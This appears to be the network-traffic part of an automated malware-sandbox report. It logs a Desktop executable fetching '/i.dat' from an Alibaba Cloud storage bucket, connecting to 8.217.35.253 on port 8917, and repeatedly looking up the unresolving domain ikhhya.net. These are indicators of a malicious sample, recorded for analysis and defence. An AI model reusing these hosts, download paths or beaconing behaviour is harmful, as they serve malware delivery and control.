                                                                            Jan 15, 2025 09:03:37.947091103 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.947257996 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.947292089 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.947297096 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.947304964 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.947326899 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.947345018 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.947360039 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.947396040 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.947731018 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.947767019 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.947781086 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.947814941 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.947824955 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.947854042 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.948406935 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.948447943 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.948642015 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.948682070 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.948689938 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.948729992 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.948753119 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.948779106 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.948790073 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.948792934 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.948807001 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.948822975 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.951751947 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.951786995 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.953102112 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.953139067 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.955022097 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.955060005 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.959255934 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.959321022 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.961368084 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.961421013 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:37.965328932 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:37.965377092 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.050086021 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.050158978 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.052922010 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.052998066 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.054764032 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.054812908 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.056710958 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.056761980 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.060353041 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.060425997 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.062480927 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.062565088 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.066231966 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.066279888 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.068228006 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.068290949 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.070147038 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.070235014 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.072012901 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.072057962 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.072062969 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.072099924 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.072108984 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.072145939 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.073765993 CET49963443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.073781013 CET44349963118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.657469034 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.657533884 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:38.657597065 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.658230066 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:38.658261061 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:39.903330088 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:39.903393030 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:39.903728962 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:39.903743029 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:39.903898001 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:39.903907061 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.230669975 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.230690956 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.230730057 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.230762005 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.230783939 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.230828047 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.231148958 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.231189013 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.234791994 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.234839916 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.236752987 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.236809015 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.318126917 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.318197966 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.318334103 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.318368912 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.318387985 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.318403006 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.318419933 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.318440914 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.319204092 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.319253922 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.320174932 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.320229053 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.320241928 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.320270061 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:40.321017981 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.321424961 CET49996443192.168.2.4118.178.60.9
                                                                            Jan 15, 2025 09:03:40.321444035 CET44349996118.178.60.9192.168.2.4
                                                                            Jan 15, 2025 09:03:42.564888954 CET500188917192.168.2.48.217.35.253
                                                                            Jan 15, 2025 09:03:42.571760893 CET8917500188.217.35.253192.168.2.4
                                                                            Jan 15, 2025 09:03:42.571834087 CET500188917192.168.2.48.217.35.253
                                                                            Jan 15, 2025 09:03:43.489269018 CET500188917192.168.2.48.217.35.253
                                                                            Jan 15, 2025 09:03:43.494477034 CET8917500188.217.35.253192.168.2.4
                                                                            Jan 15, 2025 09:05:30.346052885 CET8917500188.217.35.253192.168.2.4
                                                                            Jan 15, 2025 09:05:30.488316059 CET500188917192.168.2.48.217.35.253
                                                                            Jan 15, 2025 09:05:30.768903971 CET500188917192.168.2.48.217.35.253
                                                                            Jan 15, 2025 09:05:30.773873091 CET8917500188.217.35.253192.168.2.4

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 15, 2025 09:02:22.497767925 CET5431853192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:02:22.974004030 CET53543181.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:03:00.688877106 CET6279853192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:03:01.032608986 CET53627981.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:03:41.618005037 CET5192153192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:03:41.627791882 CET53519211.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:03:47.668781996 CET5914753192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:03:47.678628922 CET53591471.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:03:53.707622051 CET5134853192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:03:53.717839956 CET53513481.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:03:59.738693953 CET5194553192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:03:59.749047041 CET53519451.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:05.770215034 CET6398453192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:05.779875994 CET53639841.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:11.801213980 CET5149353192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:11.818049908 CET53514931.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:17.887006998 CET5569353192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:17.897330999 CET53556931.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:23.051232100 CET6017753192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:23.058610916 CET53601771.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:29.020064116 CET5005153192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:29.029913902 CET53500511.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:34.552167892 CET4979253192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:34.563173056 CET53497921.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:39.520263910 CET5269853192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:39.530792952 CET53526981.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:44.541555882 CET5615953192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:44.550681114 CET53561591.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:49.472784996 CET6425853192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:49.481975079 CET53642581.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:54.475965023 CET5025853192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:54.494138002 CET53502581.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:04:59.480114937 CET4962953192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:04:59.489789963 CET53496291.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:04.478207111 CET6346353192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:04.497617006 CET53634631.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:09.484481096 CET5409653192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:09.491859913 CET53540961.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:14.478463888 CET6222653192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:14.488841057 CET53622261.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:19.473944902 CET5907253192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:19.482867002 CET53590721.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:24.476016998 CET5894453192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:24.486577034 CET53589441.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:29.481287003 CET4949053192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:29.491236925 CET53494901.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:34.482922077 CET5955353192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:34.492486954 CET53595531.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:39.477766991 CET6011953192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:39.496020079 CET53601191.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:44.473386049 CET6450753192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:44.483592033 CET53645071.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:49.473665953 CET6398353192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:49.481272936 CET53639831.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:54.490591049 CET6236653192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:54.500653028 CET53623661.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:05:59.474513054 CET5465753192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:05:59.481625080 CET53546571.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:06:04.479362965 CET5395153192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:06:04.490287066 CET53539511.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:06:09.474893093 CET6048053192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:06:09.492938042 CET53604801.1.1.1192.168.2.4
                                                                            Jan 15, 2025 09:06:14.481712103 CET5162653192.168.2.41.1.1.1
                                                                            Jan 15, 2025 09:06:14.488956928 CET53516261.1.1.1192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 15, 2025 09:02:22.497767925 CET192.168.2.41.1.1.10x3a8bStandard query (0)vien3h.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:00.688877106 CET192.168.2.41.1.1.10xc8a5Standard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:41.618005037 CET192.168.2.41.1.1.10xabe2Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:47.668781996 CET192.168.2.41.1.1.10xa381Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:53.707622051 CET192.168.2.41.1.1.10xff27Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:59.738693953 CET192.168.2.41.1.1.10xef1Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:05.770215034 CET192.168.2.41.1.1.10xe741Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:11.801213980 CET192.168.2.41.1.1.10x6700Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:17.887006998 CET192.168.2.41.1.1.10xd679Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:23.051232100 CET192.168.2.41.1.1.10xe795Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:29.020064116 CET192.168.2.41.1.1.10xc3e2Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:34.552167892 CET192.168.2.41.1.1.10xe5ccStandard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:39.520263910 CET192.168.2.41.1.1.10x5a84Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:44.541555882 CET192.168.2.41.1.1.10xfdcaStandard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:49.472784996 CET192.168.2.41.1.1.10xd3ccStandard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:54.475965023 CET192.168.2.41.1.1.10xf243Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:59.480114937 CET192.168.2.41.1.1.10x368dStandard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:04.478207111 CET192.168.2.41.1.1.10x19e2Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:09.484481096 CET192.168.2.41.1.1.10xae39Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:14.478463888 CET192.168.2.41.1.1.10x41fbStandard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:19.473944902 CET192.168.2.41.1.1.10x9c6aStandard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:24.476016998 CET192.168.2.41.1.1.10xf7bbStandard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:29.481287003 CET192.168.2.41.1.1.10xd709Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:34.482922077 CET192.168.2.41.1.1.10xb0b6Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:39.477766991 CET192.168.2.41.1.1.10x68ccStandard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:44.473386049 CET192.168.2.41.1.1.10x8508Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:49.473665953 CET192.168.2.41.1.1.10xec36Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:54.490591049 CET192.168.2.41.1.1.10x11a7Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:59.474513054 CET192.168.2.41.1.1.10x668aStandard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:06:04.479362965 CET192.168.2.41.1.1.10xe65bStandard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:06:09.474893093 CET192.168.2.41.1.1.10x6420Standard query (0)ikhhya.netA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:06:14.481712103 CET192.168.2.41.1.1.10xb750Standard query (0)ikhhya.netA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 15, 2025 09:02:22.974004030 CET1.1.1.1192.168.2.40x3a8bNo error (0)vien3h.oss-cn-beijing.aliyuncs.comsc-20ih.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 15, 2025 09:02:22.974004030 CET1.1.1.1192.168.2.40x3a8bNo error (0)sc-20ih.cn-beijing.oss-adns.aliyuncs.comsc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 15, 2025 09:02:22.974004030 CET1.1.1.1192.168.2.40x3a8bNo error (0)sc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.17A (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:01.032608986 CET1.1.1.1192.168.2.40xc8a5No error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:01.032608986 CET1.1.1.1192.168.2.40xc8a5No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:01.032608986 CET1.1.1.1192.168.2.40xc8a5No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:41.627791882 CET1.1.1.1192.168.2.40xabe2Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:47.678628922 CET1.1.1.1192.168.2.40xa381Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:53.717839956 CET1.1.1.1192.168.2.40xff27Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:03:59.749047041 CET1.1.1.1192.168.2.40xef1Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:05.779875994 CET1.1.1.1192.168.2.40xe741Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:11.818049908 CET1.1.1.1192.168.2.40x6700Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:17.897330999 CET1.1.1.1192.168.2.40xd679Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:23.058610916 CET1.1.1.1192.168.2.40xe795Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:29.029913902 CET1.1.1.1192.168.2.40xc3e2Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:34.563173056 CET1.1.1.1192.168.2.40xe5ccName error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:39.530792952 CET1.1.1.1192.168.2.40x5a84Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:44.550681114 CET1.1.1.1192.168.2.40xfdcaName error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:49.481975079 CET1.1.1.1192.168.2.40xd3ccName error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:54.494138002 CET1.1.1.1192.168.2.40xf243Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:04:59.489789963 CET1.1.1.1192.168.2.40x368dName error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:04.497617006 CET1.1.1.1192.168.2.40x19e2Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:09.491859913 CET1.1.1.1192.168.2.40xae39Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:14.488841057 CET1.1.1.1192.168.2.40x41fbName error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:19.482867002 CET1.1.1.1192.168.2.40x9c6aName error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:24.486577034 CET1.1.1.1192.168.2.40xf7bbName error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:29.491236925 CET1.1.1.1192.168.2.40xd709Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:34.492486954 CET1.1.1.1192.168.2.40xb0b6Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:39.496020079 CET1.1.1.1192.168.2.40x68ccName error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:44.483592033 CET1.1.1.1192.168.2.40x8508Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:49.481272936 CET1.1.1.1192.168.2.40xec36Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:54.500653028 CET1.1.1.1192.168.2.40x11a7Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:05:59.481625080 CET1.1.1.1192.168.2.40x668aName error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:06:04.490287066 CET1.1.1.1192.168.2.40xe65bName error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:06:09.492938042 CET1.1.1.1192.168.2.40x6420Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 09:06:14.488956928 CET1.1.1.1192.168.2.40xb750Name error (3)ikhhya.netnonenoneA (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • vien3h.oss-cn-beijing.aliyuncs.com
                                                                            • 22mm.oss-cn-hangzhou.aliyuncs.com

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.44973039.103.20.174437276C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:02:24 UTC105OUTGET /i.dat HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Do
                                                                            Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                            2025-01-15 08:02:24 UTC557INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:02:24 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 512
                                                                            Connection: close
                                                                            x-oss-request-id: 67876B90A645AE38350B9544
                                                                            Accept-Ranges: bytes
                                                                            ETag: "C92063FD4E148F2D2386C0DA8E46E701"
                                                                            Last-Modified: Mon, 13 Jan 2025 12:22:07 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 8416026672269937305
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000113
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: ySBj/U4Ujy0jhsDajkbnAQ==
                                                                            x-oss-server-time: 4
